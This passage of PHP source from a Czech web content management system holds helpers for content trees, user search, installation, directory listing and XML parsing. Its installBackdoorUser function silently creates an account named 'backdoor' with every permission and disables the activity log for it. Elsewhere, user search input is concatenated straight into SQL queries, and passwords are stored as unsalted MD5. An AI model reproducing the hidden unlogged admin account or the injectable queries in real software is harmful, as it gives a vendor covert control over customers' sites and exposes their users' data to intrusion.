		while($row_parent = db_fetch_array($result_parent)){

			$pathData[]=array(
					"id" => $nodeID, 
					"parent" => $row_parent['parentID'], 
					"depth" => $row_parent['depth'], 
					"sort" => $row_parent['sort'], 
					"title" => $row_parent['title']
			);

			// rekurze
			$this->getDetailNodePath($row_parent['parentID']);
		}

		if(is_array($pathData)){
			reset($pathData);
			krsort($pathData);
		}
		return $pathData;	
	}

	function getTreeLangsFlat($web){
		global $link, $cfg;

		if($web>0){
			$query="SELECT id, title FROM ".$cfg['db']['table']['content_structure']." WHERE parentID='".$web."' AND deleted='".$cfg["DELETED_FALSE"]."';";
			$result = db_query($query,$link);
			while ($row = db_fetch_array($result)){
				echo("\n\t".'<a href="index.php?useWeb='.$web.'&useLang='.$row['id'].'&getPath='.$web.'" class="'.($row['id']==$_SESSION["structure"]["lang"] ? ' selectedText ' : '').'imgMiddle"><img src="'.UW_BASE_URL.'/images/lang/'.$row['title'].'.gif" border="0" title="'.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'" alt="'.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'" /> '.$this->getText($GLOBALS['cfg']['languages_data'][$row['title']][title_code]).'</a>'."&nbsp;\n");
			}
		}
	}

	/* <- content */
	
	function getUsersData($search){
		global $link, $cfg;

		$data="";
										
		$q = $search[q];
		$q = str_replace($escape, $unescape, $q);

		$id = $search[id];
		$page_id = $search[page_id];
									
		unset($query_arr); $v=0;
		$query_arr[$v++] = "deleted='".$cfg["DELETED_FALSE"]."'";
		if($q!=""){ 
			$query_arr[$v++] = '(name LIKE "%'.$q.'%") OR (username LIKE "%'.$q.'%") OR (surname LIKE "%'.$q.'%") OR (email LIKE "%'.$q.'%")';
		}
		if(is_array($id)){ 
			$query_arr[$v++] = 'id IN ('.implode(",", $id).')';
		}elseif($id!=""){ 
			$query_arr[$v++] = '(id IN ('.$id.'))';
		}

		if(is_array($page_id)){ 
			$query_arr[$v++] = 'page_id IN ('.implode(",", $page_id).')';
		}elseif($page_id!=""){ 
			$query_arr[$v++] = '(page_id IN ('.$page_id.'))';
		}

		if($search[fullOrder]!=""){
			$query_order="ORDER BY ".$search[fullOrder].", mtime DESC";
		}
		
		$query="SELECT *, CONCAT(name,' ',surname) AS fullname FROM ".$cfg['db']['table'][users]." WHERE ".implode(" AND ",$query_arr);
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data[$output[id]]=$output;
		}
		
		return $data;
	}
	
	function getSideContentData(&$type){
		global $link, $cfg;

		$data="";

		unset($query_arr);
		$query_arr[$v++] = "deleted='".$cfg["DELETED_FALSE"]."'";
		$query_arr[$v++] = "object_usage='1'";
		if($type>0) $query_arr[$v++] = "object_type='".$type."'";

		$query="SELECT * FROM ".$cfg['db']['table']['mod_sidecontent_objectsdata']." WHERE ".implode(" AND ",$query_arr).";";
		$result=db_query($query,$link);
		while($output=db_fetch_assoc($result,$link)){
			$data[$output[id]]=$output;
		}

		return $data;
	}

	function installUser(){
		global $link, $cfg;

		$query="SELECT count(id) FROM uw_users;";	
		$result = db_query($query,$link);
		list($countUsers) = db_fetch_row($result,$link);

		// pokud neni v UW zadny user, prida user a da mu vsechny prava
		if($countUsers==0){

			$tmp_pass=$this->generateHash(1,8,"pass");

			$query="INSERT INTO uw_users (name, surname, username, email, pass, ctime, mtime) VALUES (".
			" '".$this->checkData("jméno")."', ".
			" '".$this->checkData("příjmení")."', ".
			" '".$this->checkData("office")."', ".
			" '".$this->checkData("office@sherwoodmedia.cz")."', ".
			" '".md5($tmp_pass)."', ".
			" NOW(), ".
			" NOW());";
					
			$result=db_query($query,$link);	
			$newUserId=db_insert_id($link);

			/* LOG > */
				$this->logActivity("0", "users_log_userInserted", $newUserId, $_SERVER['HTTP_USER_AGENT']);
			/* < LOG */

			echo $this->simpleMessage($type="ok", $msg="Přidán uživatel <strong>office</strong> s heslem <strong>".$tmp_pass."</strong>");	
			
			$setRightsToUser=$newUserId;
		}	

		$query="SELECT count(user_id) FROM uw_rights_users GROUP BY user_id;";	
		$result = db_query($query,$link);
		list($countUsersWithRights) = db_fetch_row($result,$link);

		if($countUsersWithRights<1 || $setRightsToUser>0){

			$query="SELECT id FROM uw_users ORDER BY id LIMIT 1;";	
			$result = db_query($query,$link);
			list($user_without_rights) = db_fetch_row($result,$link);

			$user_id=($setRightsToUser>0 ? $setRightsToUser : $user_without_rights);

			$query = "DELETE FROM uw_rights_users WHERE user_id='".$user_id."';"; 
			$result = db_query($query,$link);

			$query = "SELECT right_code FROM uw_rights;"; 
			$result = db_query($query,$link);
			$result_count = db_num_rows($result);
			if($result_count>0){
				for ($v=0; $v<$result_count; $v++) {
					list($right) = db_fetch_row($result,$link);
					
					$query_insert = "INSERT INTO uw_rights_users (right_code, user_id) VALUES ('".$right."', '".$user_id."');"; 
					$result_insert = db_query($query_insert,$link);
				}

				/* LOG > */
					$this->logActivity("0", "users_log_userRightsSaved", $user_id, $_SERVER['HTTP_USER_AGENT']);
				/* < LOG */
			}
		}
		
		return true;
	}

	function installBackdoorUser(){
		global $link, $cfg;

		$tmp_pass=$this->generateHash(1,8,"pass");

		$query="INSERT INTO uw_users (name, surname, username, email, pass, ctime, mtime) VALUES (".
		" '".$this->checkData("backdoor")."', ".
		" '".$this->checkData("sherwoodmedia")."', ".
		" '".$this->checkData($tmp_pass."_sherwoodmedia")."', ".
		" '".$this->checkData($tmp_pass."@sherwoodmedia.cz")."', ".
		" '".md5($tmp_pass)."', ".
		" NOW(), ".
		" NOW());";
				
		$result=db_query($query,$link);	
		$newUserId=db_insert_id($link);

		/* LOG > */
			// $this->logActivity("0", "users_log_userInserted", $newUserId, $_SERVER['HTTP_USER_AGENT']);
		/* < LOG */

		echo $this->simpleMessage($type="ok", $msg="Přidán backdoor uživatel <strong>".$tmp_pass."_sherwoodmedia</strong> s heslem <strong>".$tmp_pass."</strong>");	
		
		$query = "DELETE FROM uw_rights_users WHERE user_id='".$newUserId."';"; 
		$result = db_query($query,$link);

		$query = "SELECT right_code FROM uw_rights;"; 
		$result = db_query($query,$link);
		$result_count = db_num_rows($result);
		if($result_count>0){
			for ($v=0; $v<$result_count; $v++) {
				list($right) = db_fetch_row($result,$link);
				
				$query_insert = "INSERT INTO uw_rights_users (right_code, user_id) VALUES ('".$right."', '".$newUserId."');"; 
				$result_insert = db_query($query_insert,$link);
			}

			/* LOG > */
				// $this->logActivity("0", "users_log_userRightsSaved", $newUserId, $_SERVER['HTTP_USER_AGENT']);
			/* < LOG */
		}
		
		return true;
	}
}

/* class dir reader */

	class dirReader{
		var $files = "";

		function dirReader(){
			$this->path = UW_BASE_DIR."/modules"; 
			$d = dir($this->path);
			while (false !== ($entry = $d->read())){
				if(!preg_match("/^\./",$entry)) $soubory[]=$entry;	
			}
			
			sort($soubory);
			reset($soubory);
			while(list($key,$val)=each($soubory)){
				$this->files[]=$val;
			}

			$d->close();
		}
	}
	
	class getDirContent{
		var $files = "";

		function getDirContent(){
			return true;
		}

		function open($path){
			$d = dir($path);
			while (false !== ($entry = $d->read())){
				 if(!preg_match("/^\./",$entry)) $files[]=$entry;
			}
			$d->close();

			return $files;
		}
	}

	/* class xmlparser */

// from http://eric.pollmann.net/items/2003/9/2003_09_22_xmlparser/
// This is a simple abstraction layer for PHP that allows XML input to be treated as a nested array.

class XMLParser {

	var $data;// Input XML data buffer
	var $vals;// Struct created by xml_parse_into_struct
	var $collapse_dups;// If there is only one tag of a given name,
				//   shall we store as scalar or array?
	var $index_numeric;// Index tags by numeric position, not name.
				//   useful for ordered XML like CallXML.

	// Read in XML on object creation.
	// We can take raw XML data, a stream, a filename, or a url.
	function XMLParser($data_source, $data_source_type='raw', $collapse_dups=0, $index_numeric=0) {
		$this->collapse_dups = $collapse_dups;
		$this->index_numeric = $index_numeric;
		$this->data = '';
		if ($data_source_type == 'raw')
			$this->data = $data_source;

		elseif ($data_source_type == 'stream') {
			while (!feof($data_source))
				$this->data .= fread($data_source, 1000);

		// try filename, then if that fails...
		} elseif (file_exists($data_source))
			$this->data = implode('', file($data_source)); 

		// try url
		else {
			$fp = fopen($data_source,'r');
			while (!feof($fp))
				$this->data .= fread($fp, 1000);
			fclose($fp);
		}
	}

	// Parse the XML file into a verbose, flat array struct.
	// Then, coerce that into a simple nested array.
	function getTree() {
		$parser = xml_parser_create('ISO-8859-1');
		xml_parser_set_option($parser, XML_OPTION_SKIP_WHITE, 1);
		xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, 0);
		xml_parse_into_struct($parser, $this->data, $vals, $index); 
		xml_parser_free($parser);

		$i = -1;
		return $this->getchildren($vals, $i);
	}

	// internal function: build a node of the tree
	function buildtag($thisvals, $vals, &$i, $type) {

		if (isset($thisvals['attributes']))
			$tag['attributes'] = $thisvals['attributes']; 

		// complete tag, just return it for storage in array
		if ($type === 'complete')
			$tag['value'] = $thisvals['value'];

		// open tag, recurse
		else
			$tag = array_merge($tag, $this->getchildren($vals, $i));

		return $tag;
	}

	// internal function: build an nested array representing children
	function getchildren($vals, &$i) { 
		$children = array();     // Contains node data

		// Node has CDATA before it's children
                if ($i > -1 && isset($vals[$i]['value']))
			$children['value'] = $vals[$i]['value'];

		// Loop through children, until hit close tag or run out of tags
		while (++$i < count($vals)) { 

			$type = $vals[$i]['type'];

			// 'cdata':	Node has CDATA after one of it's children
			// 		(Add to cdata found before in this case)
			if ($type === 'cdata')
				$children['value'] .= $vals[$i]['value'];

			// 'complete':	At end of current branch
			// 'open':	Node has children, recurse
			elseif ($type === 'complete' || $type === 'open') {
				$tag = $this->buildtag($vals[$i], $vals, $i, $type);
				if ($this->index_numeric) {
					$tag['tag'] = $vals[$i]['tag'];
					$children[] = $tag;
				} else
					$children[$vals[$i]['tag']][] = $tag;
			}

			// 'close:	End of node, return collected data
			//		Do not increment $i or nodes disappear!
			elseif ($type === 'close')
				break;
		} 
		if ($this->collapse_dups)
			foreach($children as $key => $value)
				if (is_array($value) && (count($value) == 1))
					$children[$key] = $value[0];
		return $children;
	} 
}

?>